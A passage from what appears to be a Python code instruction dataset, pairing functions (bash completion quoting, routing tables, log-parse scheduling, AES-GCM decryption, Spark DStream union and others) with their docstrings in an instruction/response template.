occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly.
### Response:
def quote_completions(self, completions, cword_prequote, last_wordbreak_pos):
"""
If the word under the cursor started with a quote (as indicated by a nonempty ``cword_prequote``), escapes
occurrences of that quote character in the completions, and adds the quote to the beginning of each completion.
Otherwise, escapes all characters that bash splits words on (``COMP_WORDBREAKS``), and removes portions of
completions before the first colon if (``COMP_WORDBREAKS``) contains a colon.
If there is only one completion, and it doesn't end with a **continuation character** (``/``, ``:``, or ``=``),
adds a space after the completion.
This method is exposed for overriding in subclasses; there is no need to use it directly.
"""
special_chars = "\\"
# If the word under the cursor was quoted, escape the quote char.
# Otherwise, escape all special characters and specially handle all COMP_WORDBREAKS chars.
if cword_prequote == "":
# Bash mangles completions which contain characters in COMP_WORDBREAKS.
# This workaround has the same effect as __ltrim_colon_completions in bash_completion
# (extended to characters other than the colon).
if last_wordbreak_pos:
completions = [c[last_wordbreak_pos + 1:] for c in completions]
special_chars += "();<>|&!`$* \t\n\"'"
elif cword_prequote == '"':
special_chars += '"`$!'
if os.environ.get("_ARGCOMPLETE_SHELL") == "tcsh":
# tcsh escapes special characters itself.
special_chars = ""
elif cword_prequote == "'":
# Nothing can be escaped in single quotes, so we need to close
# the string, escape the single quote, then open a new string.
special_chars = ""
completions = [c.replace("'", r"'\''") for c in completions]
for char in special_chars:
completions = [c.replace(char, "\\" + char) for c in completions]
if self.append_space:
# Similar functionality in bash was previously turned off by supplying the "-o nospace" option to complete.
# Now it is conditionally disabled using "compopt -o nospace" if the match ends in a continuation character.
# This code is retained for environments where this isn't done natively.
continuation_chars = "=/:"
if len(completions) == 1 and completions[0][-1] not in continuation_chars:
if cword_prequote == "":
completions[0] += " "
return completions |
def ensure_all_alt_ids_have_a_nest(nest_spec, list_elements, all_ids):
"""
Ensures that the alternative id's in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None.
"""
unaccounted_alt_ids = []
for alt_id in all_ids:
if alt_id not in list_elements:
unaccounted_alt_ids.append(alt_id)
if unaccounted_alt_ids != []:
msg = "Associate the following alternative ids with a nest: {}"
raise ValueError(msg.format(unaccounted_alt_ids))
return None | Ensures that the alternative id's in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None. | Below is the the instruction that describes the task:
### Input:
Ensures that the alternative id's in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None.
### Response:
def ensure_all_alt_ids_have_a_nest(nest_spec, list_elements, all_ids):
"""
Ensures that the alternative id's in `nest_spec` are all associated with
a nest. Raises a helpful ValueError if they are not.
Parameters
----------
nest_spec : OrderedDict, or None, optional.
Keys are strings that define the name of the nests. Values are lists of
alternative ids, denoting which alternatives belong to which nests.
Each alternative id must only be associated with a single nest!
Default == None.
list_elements : list of ints.
Each element should correspond to one of the alternatives identified as
belonging to a nest.
all_ids : list of ints.
Each element should correspond to one of the alternatives that is
present in the universal choice set for this model.
Returns
-------
None.
"""
unaccounted_alt_ids = []
for alt_id in all_ids:
if alt_id not in list_elements:
unaccounted_alt_ids.append(alt_id)
if unaccounted_alt_ids != []:
msg = "Associate the following alternative ids with a nest: {}"
raise ValueError(msg.format(unaccounted_alt_ids))
return None |
def load_raw(raw_pickle_file):
"""
Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file.
"""
with open(raw_pickle_file, 'rb') as f:
raw = pickle.load(f)
logging.info("Loaded %i recordings.", len(raw['handwriting_datasets']))
return raw | Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file. | Below is the the instruction that describes the task:
### Input:
Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file.
### Response:
def load_raw(raw_pickle_file):
"""
Load a pickle file of raw recordings.
Parameters
----------
raw_pickle_file : str
Path to a pickle file which contains raw recordings.
Returns
-------
dict
The loaded pickle file.
"""
with open(raw_pickle_file, 'rb') as f:
raw = pickle.load(f)
logging.info("Loaded %i recordings.", len(raw['handwriting_datasets']))
return raw |
def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): _InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables | Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...] | Below is the the instruction that describes the task:
### Input:
Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
### Response:
def routing_tree_to_tables(routes, net_keys):
"""Convert a set of
:py:class:`~rig.place_and_route.routing_tree.RoutingTree` s into a per-chip
set of routing tables.
.. warning::
A :py:exc:`rig.routing_table.MultisourceRouteError` will
be raised if entries with identical keys and masks but with differing
routes are generated. This is not a perfect test, entries which would
otherwise collide are not spotted.
.. warning::
The routing trees provided are assumed to be correct and continuous
(not missing any hops). If this is not the case, the output is
undefined.
.. note::
If a routing tree has a terminating vertex whose route is set to None,
that vertex is ignored.
Parameters
----------
routes : {net: :py:class:`~rig.place_and_route.routing_tree.RoutingTree`, \
...}
The complete set of RoutingTrees representing all routes in the system.
(Note: this is the same data structure produced by routers in the
:py:mod:`~rig.place_and_route` module.)
net_keys : {net: (key, mask), ...}
The key and mask associated with each net.
Returns
-------
{(x, y): [:py:class:`~rig.routing_table.RoutingTableEntry`, ...]
"""
# Pairs of inbound and outbound routes.
InOutPair = namedtuple("InOutPair", "ins, outs")
# {(x, y): {(key, mask): _InOutPair}}
route_sets = defaultdict(OrderedDict)
for net, routing_tree in iteritems(routes):
key, mask = net_keys[net]
# The direction is the Links entry which describes the direction in
# which we last moved to reach the node (or None for the root).
for direction, (x, y), out_directions in routing_tree.traverse():
# Determine the in_direction
in_direction = direction
if in_direction is not None:
in_direction = direction.opposite
# Add a routing entry
if (key, mask) in route_sets[(x, y)]:
# If there is an existing route set raise an error if the out
# directions are not equivalent.
if route_sets[(x, y)][(key, mask)].outs != out_directions:
raise MultisourceRouteError(key, mask, (x, y))
# Otherwise, add the input directions as this represents a
# merge of the routes.
route_sets[(x, y)][(key, mask)].ins.add(in_direction)
else:
# Otherwise create a new route set
route_sets[(x, y)][(key, mask)] = \
InOutPair({in_direction}, set(out_directions))
# Construct the routing tables from the route sets
routing_tables = defaultdict(list)
for (x, y), routes in iteritems(route_sets):
for (key, mask), route in iteritems(routes):
# Add the route
routing_tables[(x, y)].append(
RoutingTableEntry(route.outs, key, mask, route.ins)
)
return routing_tables |
def _schedule_log_parsing(job, job_logs, result):
"""Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job
"""
# importing here to avoid an import loop
from treeherder.log_parser.tasks import parse_logs
task_types = {
"errorsummary_json",
"buildbot_text",
"builds-4h"
}
job_log_ids = []
for job_log in job_logs:
# a log can be submitted already parsed. So only schedule
# a parsing task if it's ``pending``
# the submitter is then responsible for submitting the
# text_log_summary artifact
if job_log.status != JobLog.PENDING:
continue
# if this is not a known type of log, abort parse
if job_log.name not in task_types:
continue
job_log_ids.append(job_log.id)
# TODO: Replace the use of different queues for failures vs not with the
# RabbitMQ priority feature (since the idea behind separate queues was
# only to ensure failures are dealt with first if there is a backlog).
if result != 'success':
queue = 'log_parser_fail'
priority = 'failures'
else:
queue = 'log_parser'
priority = "normal"
parse_logs.apply_async(queue=queue,
args=[job.id, job_log_ids, priority]) | Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job | Below is the the instruction that describes the task:
### Input:
Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job
### Response:
def _schedule_log_parsing(job, job_logs, result):
"""Kick off the initial task that parses the log data.
log_data is a list of job log objects and the result for that job
"""
# importing here to avoid an import loop
from treeherder.log_parser.tasks import parse_logs
task_types = {
"errorsummary_json",
"buildbot_text",
"builds-4h"
}
job_log_ids = []
for job_log in job_logs:
# a log can be submitted already parsed. So only schedule
# a parsing task if it's ``pending``
# the submitter is then responsible for submitting the
# text_log_summary artifact
if job_log.status != JobLog.PENDING:
continue
# if this is not a known type of log, abort parse
if job_log.name not in task_types:
continue
job_log_ids.append(job_log.id)
# TODO: Replace the use of different queues for failures vs not with the
# RabbitMQ priority feature (since the idea behind separate queues was
# only to ensure failures are dealt with first if there is a backlog).
if result != 'success':
queue = 'log_parser_fail'
priority = 'failures'
else:
queue = 'log_parser'
priority = "normal"
parse_logs.apply_async(queue=queue,
args=[job.id, job_log_ids, priority]) |
def auto(self):
"""Returns the highest whole-number unit."""
if self._value >= 1099511627776:
return self.TiB, 'TiB'
if self._value >= 1073741824:
return self.GiB, 'GiB'
if self._value >= 1048576:
return self.MiB, 'MiB'
if self._value >= 1024:
return self.KiB, 'KiB'
else:
return self.B, 'B' | Returns the highest whole-number unit. | Below is the the instruction that describes the task:
### Input:
Returns the highest whole-number unit.
### Response:
def auto(self):
"""Returns the highest whole-number unit."""
if self._value >= 1099511627776:
return self.TiB, 'TiB'
if self._value >= 1073741824:
return self.GiB, 'GiB'
if self._value >= 1048576:
return self.MiB, 'MiB'
if self._value >= 1024:
return self.KiB, 'KiB'
else:
return self.B, 'B' |
def async_update(self, event):
"""New event for light.
Check that state is part of event.
Signal that light has updated state.
"""
self.update_attr(event.get('state', {}))
super().async_update(event) | New event for light.
Check that state is part of event.
Signal that light has updated state. | Below is the the instruction that describes the task:
### Input:
New event for light.
Check that state is part of event.
Signal that light has updated state.
### Response:
def async_update(self, event):
"""New event for light.
Check that state is part of event.
Signal that light has updated state.
"""
self.update_attr(event.get('state', {}))
super().async_update(event) |
def rotate(self):
'''Move the first address to the last position.'''
item = self._address_infos.pop(0)
self._address_infos.append(item) | Move the first address to the last position. | Below is the the instruction that describes the task:
### Input:
Move the first address to the last position.
### Response:
def rotate(self):
'''Move the first address to the last position.'''
item = self._address_infos.pop(0)
self._address_infos.append(item) |
def ip_addresses_from_xff(value: str) -> List[str]:
"""
Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
a list of IP address as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239
"""
if not value:
return []
return [x.strip() for x in value.split(",")] | Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
a list of IP address as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239 | Below is the the instruction that describes the task:
### Input:
Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
a list of IP address as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239
### Response:
def ip_addresses_from_xff(value: str) -> List[str]:
"""
Returns a list of IP addresses (as strings), given the value of an HTTP
``X-Forwarded-For`` (or ``WSGI HTTP_X_FORWARDED_FOR``) header.
Args:
value:
the value of an HTTP ``X-Forwarded-For`` (or ``WSGI
HTTP_X_FORWARDED_FOR``) header
Returns:
a list of IP address as strings
See:
- https://en.wikipedia.org/wiki/X-Forwarded-For
- https://developer.mozilla.org/en-US/docs/Web/HTTP/Headers/X-Forwarded-For # noqa
- NOT THIS: http://tools.ietf.org/html/rfc7239
"""
if not value:
return []
return [x.strip() for x in value.split(",")] |
def flush(self):
"""Ensure all logging output has been flushed."""
if self.shutdown:
return
self.flush_buffers(force=True)
self.queue.put(FLUSH_MARKER)
self.queue.join() | Ensure all logging output has been flushed. | Below is the the instruction that describes the task:
### Input:
Ensure all logging output has been flushed.
### Response:
def flush(self):
"""Ensure all logging output has been flushed."""
if self.shutdown:
return
self.flush_buffers(force=True)
self.queue.put(FLUSH_MARKER)
self.queue.join() |
def get_doctypes(self, default_doctypes=None):
"""Returns the doctypes (or mapping type names) to use."""
doctypes = self.type.get_mapping_type_name()
if isinstance(doctypes, six.string_types):
doctypes = [doctypes]
return super(S, self).get_doctypes(default_doctypes=doctypes) | Returns the doctypes (or mapping type names) to use. | Below is the the instruction that describes the task:
### Input:
Returns the doctypes (or mapping type names) to use.
### Response:
def get_doctypes(self, default_doctypes=None):
"""Returns the doctypes (or mapping type names) to use."""
doctypes = self.type.get_mapping_type_name()
if isinstance(doctypes, six.string_types):
doctypes = [doctypes]
return super(S, self).get_doctypes(default_doctypes=doctypes) |
def _queryset_iterator(qs):
"""
Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used.
"""
# Avoid double-processing draft items in our custom iterator when we
# are in a `PublishingQuerySet` that is also a subclass of the
# monkey-patched `UrlNodeQuerySet`
if issubclass(type(qs), UrlNodeQuerySet):
super_without_boobytrap_iterator = super(UrlNodeQuerySet, qs)
else:
super_without_boobytrap_iterator = super(PublishingQuerySet, qs)
if is_publishing_middleware_active() \
and not is_draft_request_context():
for item in super_without_boobytrap_iterator.iterator():
if getattr(item, 'publishing_is_draft', False):
yield DraftItemBoobyTrap(item)
else:
yield item
else:
for item in super_without_boobytrap_iterator.iterator():
yield item | Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used. | Below is the the instruction that describes the task:
### Input:
Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used.
### Response:
def _queryset_iterator(qs):
"""
Override default iterator to wrap returned items in a publishing
sanity-checker "booby trap" to lazily raise an exception if DRAFT
items are mistakenly returned and mis-used in a public context
where only PUBLISHED items should be used.
This booby trap is added when all of:
- the publishing middleware is active, and therefore able to report
accurately whether the request is in a drafts-permitted context
- the publishing middleware tells us we are not in
a drafts-permitted context, which means only published items
should be used.
"""
# Avoid double-processing draft items in our custom iterator when we
# are in a `PublishingQuerySet` that is also a subclass of the
# monkey-patched `UrlNodeQuerySet`
if issubclass(type(qs), UrlNodeQuerySet):
super_without_boobytrap_iterator = super(UrlNodeQuerySet, qs)
else:
super_without_boobytrap_iterator = super(PublishingQuerySet, qs)
if is_publishing_middleware_active() \
and not is_draft_request_context():
for item in super_without_boobytrap_iterator.iterator():
if getattr(item, 'publishing_is_draft', False):
yield DraftItemBoobyTrap(item)
else:
yield item
else:
for item in super_without_boobytrap_iterator.iterator():
yield item |
def imbound(clspatch, *args, **kwargs):
"""
:param clspatch:
:param args:
:param kwargs:
:return:
"""
# todo : add example
c = kwargs.pop('color', kwargs.get('edgecolor', None))
kwargs.update(facecolor='none', edgecolor=c)
return impatch(clspatch, *args, **kwargs) | :param clspatch:
:param args:
:param kwargs:
:return: | Below is the the instruction that describes the task:
### Input:
:param clspatch:
:param args:
:param kwargs:
:return:
### Response:
def imbound(clspatch, *args, **kwargs):
"""
:param clspatch:
:param args:
:param kwargs:
:return:
"""
# todo : add example
c = kwargs.pop('color', kwargs.get('edgecolor', None))
kwargs.update(facecolor='none', edgecolor=c)
return impatch(clspatch, *args, **kwargs) |
def parse_arguments(args):
'''Parse arguments from the command line'''
parser = argparse.ArgumentParser(description='Convert JAMS to .lab files')
parser.add_argument('-c',
'--comma-separated',
dest='csv',
action='store_true',
default=False,
help='Output in .csv instead of .lab')
parser.add_argument('--comment', dest='comment_char', type=str, default='#',
help='Comment character')
parser.add_argument('-n',
'--namespace',
dest='namespaces',
nargs='+',
default=['.*'],
help='One or more namespaces to output. Default is all.')
parser.add_argument('jams_file',
help='Path to the input jams file')
parser.add_argument('output_prefix', help='Prefix for output files')
return vars(parser.parse_args(args)) | Parse arguments from the command line | Below is the the instruction that describes the task:
### Input:
Parse arguments from the command line
### Response:
def parse_arguments(args):
'''Parse arguments from the command line'''
parser = argparse.ArgumentParser(description='Convert JAMS to .lab files')
parser.add_argument('-c',
'--comma-separated',
dest='csv',
action='store_true',
default=False,
help='Output in .csv instead of .lab')
parser.add_argument('--comment', dest='comment_char', type=str, default='#',
help='Comment character')
parser.add_argument('-n',
'--namespace',
dest='namespaces',
nargs='+',
default=['.*'],
help='One or more namespaces to output. Default is all.')
parser.add_argument('jams_file',
help='Path to the input jams file')
parser.add_argument('output_prefix', help='Prefix for output files')
return vars(parser.parse_args(args)) |
def polar_direction_xyz(self):
"""
get current polar direction in Roche (xyz) coordinates
"""
return mesh.spin_in_roche(self.polar_direction_uvw,
self.true_anom, self.elongan, self.eincl).astype(float) | get current polar direction in Roche (xyz) coordinates | Below is the the instruction that describes the task:
### Input:
get current polar direction in Roche (xyz) coordinates
### Response:
def polar_direction_xyz(self):
"""
get current polar direction in Roche (xyz) coordinates
"""
return mesh.spin_in_roche(self.polar_direction_uvw,
self.true_anom, self.elongan, self.eincl).astype(float) |
def decrypt(self, k, a, iv, e, t):
""" Decrypt accoriding to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error
"""
cipher = Cipher(algorithms.AES(k), modes.GCM(iv, t),
backend=self.backend)
decryptor = cipher.decryptor()
decryptor.authenticate_additional_data(a)
return decryptor.update(e) + decryptor.finalize() | Decrypt accoriding to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error | Below is the the instruction that describes the task:
### Input:
Decrypt accoriding to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error
### Response:
def decrypt(self, k, a, iv, e, t):
""" Decrypt accoriding to the selected encryption and hashing
functions.
:param k: Encryption key (optional)
:param a: Additional Authenticated Data
:param iv: Initialization Vector
:param e: Ciphertext
:param t: Authentication Tag
Returns plaintext or raises an error
"""
cipher = Cipher(algorithms.AES(k), modes.GCM(iv, t),
backend=self.backend)
decryptor = cipher.decryptor()
decryptor.authenticate_additional_data(a)
return decryptor.update(e) + decryptor.finalize() |
def do_register(self, arg):
"""
[~thread] r - print(the value of all registers
[~thread] r <register> - print(the value of a register
[~thread] r <register>=<value> - change the value of a register
[~thread] register - print(the value of all registers
[~thread] register <register> - print(the value of a register
[~thread] register <register>=<value> - change the value of a register
"""
arg = arg.strip()
if not arg:
self.print_current_location()
else:
equ = arg.find('=')
if equ >= 0:
register = arg[:equ].strip()
value = arg[equ+1:].strip()
if not value:
value = '0'
self.change_register(register, value)
else:
value = self.input_register(arg)
if value is None:
raise CmdError("unknown register: %s" % arg)
try:
label = None
thread = self.get_thread_from_prefix()
process = thread.get_process()
module = process.get_module_at_address(value)
if module:
label = module.get_label_at_address(value)
except RuntimeError:
label = None
reg = arg.upper()
val = HexDump.address(value)
if label:
print("%s: %s (%s)" % (reg, val, label))
else:
print("%s: %s" % (reg, val)) | [~thread] r - print(the value of all registers
[~thread] r <register> - print(the value of a register
[~thread] r <register>=<value> - change the value of a register
[~thread] register - print(the value of all registers
[~thread] register <register> - print(the value of a register
[~thread] register <register>=<value> - change the value of a register | Below is the the instruction that describes the task:
### Input:
[~thread] r - print(the value of all registers
[~thread] r <register> - print(the value of a register
[~thread] r <register>=<value> - change the value of a register
[~thread] register - print(the value of all registers
[~thread] register <register> - print(the value of a register
[~thread] register <register>=<value> - change the value of a register
### Response:
def do_register(self, arg):
"""
[~thread] r - print(the value of all registers
[~thread] r <register> - print(the value of a register
[~thread] r <register>=<value> - change the value of a register
[~thread] register - print(the value of all registers
[~thread] register <register> - print(the value of a register
[~thread] register <register>=<value> - change the value of a register
"""
arg = arg.strip()
if not arg:
self.print_current_location()
else:
equ = arg.find('=')
if equ >= 0:
register = arg[:equ].strip()
value = arg[equ+1:].strip()
if not value:
value = '0'
self.change_register(register, value)
else:
value = self.input_register(arg)
if value is None:
raise CmdError("unknown register: %s" % arg)
try:
label = None
thread = self.get_thread_from_prefix()
process = thread.get_process()
module = process.get_module_at_address(value)
if module:
label = module.get_label_at_address(value)
except RuntimeError:
label = None
reg = arg.upper()
val = HexDump.address(value)
if label:
print("%s: %s (%s)" % (reg, val, label))
else:
print("%s: %s" % (reg, val)) |
def main(*argv):
""" main driver of program """
try:
url = str(argv[0])
arcgisSH = ArcGISTokenSecurityHandler()
if arcgisSH.valid == False:
arcpy.AddError(arcgisSH.message)
return
fl = FeatureLayer(
url=url,
securityHandler=arcgisSH,
initialize=True)
res = fl.query(where="1=1",out_fields='*',returnGeometry=False)
arcpy.AddMessage(res)
arcpy.SetParameterAsText(1, str(res))
except arcpy.ExecuteError:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror)
arcpy.AddError("ArcPy Error Message: %s" % arcpy.GetMessages(2))
except FunctionError, f_e:
messages = f_e.args[0]
arcpy.AddError("error in function: %s" % messages["function"])
arcpy.AddError("error on line: %s" % messages["line"])
arcpy.AddError("error in file name: %s" % messages["filename"])
arcpy.AddError("with error message: %s" % messages["synerror"])
arcpy.AddError("ArcPy Error Message: %s" % messages["arc"])
except:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror) | main driver of program | Below is the the instruction that describes the task:
### Input:
main driver of program
### Response:
def main(*argv):
""" main driver of program """
try:
url = str(argv[0])
arcgisSH = ArcGISTokenSecurityHandler()
if arcgisSH.valid == False:
arcpy.AddError(arcgisSH.message)
return
fl = FeatureLayer(
url=url,
securityHandler=arcgisSH,
initialize=True)
res = fl.query(where="1=1",out_fields='*',returnGeometry=False)
arcpy.AddMessage(res)
arcpy.SetParameterAsText(1, str(res))
except arcpy.ExecuteError:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror)
arcpy.AddError("ArcPy Error Message: %s" % arcpy.GetMessages(2))
except FunctionError, f_e:
messages = f_e.args[0]
arcpy.AddError("error in function: %s" % messages["function"])
arcpy.AddError("error on line: %s" % messages["line"])
arcpy.AddError("error in file name: %s" % messages["filename"])
arcpy.AddError("with error message: %s" % messages["synerror"])
arcpy.AddError("ArcPy Error Message: %s" % messages["arc"])
except:
line, filename, synerror = trace()
arcpy.AddError("error on line: %s" % line)
arcpy.AddError("error in file name: %s" % filename)
arcpy.AddError("with error message: %s" % synerror) |
def union(self, *dstreams):
"""
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
"""
if not dstreams:
raise ValueError("should have at least one DStream to union")
if len(dstreams) == 1:
return dstreams[0]
if len(set(s._jrdd_deserializer for s in dstreams)) > 1:
raise ValueError("All DStreams should have same serializer")
if len(set(s._slideDuration for s in dstreams)) > 1:
raise ValueError("All DStreams should have same slide duration")
cls = SparkContext._jvm.org.apache.spark.streaming.api.java.JavaDStream
jdstreams = SparkContext._gateway.new_array(cls, len(dstreams))
for i in range(0, len(dstreams)):
jdstreams[i] = dstreams[i]._jdstream
return DStream(self._jssc.union(jdstreams), self, dstreams[0]._jrdd_deserializer) | Create a unified DStream from multiple DStreams of the same
type and same slide duration. | Below is the the instruction that describes the task:
### Input:
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
### Response:
def union(self, *dstreams):
"""
Create a unified DStream from multiple DStreams of the same
type and same slide duration.
"""
if not dstreams:
raise ValueError("should have at least one DStream to union")
if len(dstreams) == 1:
return dstreams[0]
if len(set(s._jrdd_deserializer for s in dstreams)) > 1:
raise ValueError("All DStreams should have same serializer")
if len(set(s._slideDuration for s in dstreams)) > 1:
raise ValueError("All DStreams should have same slide duration")
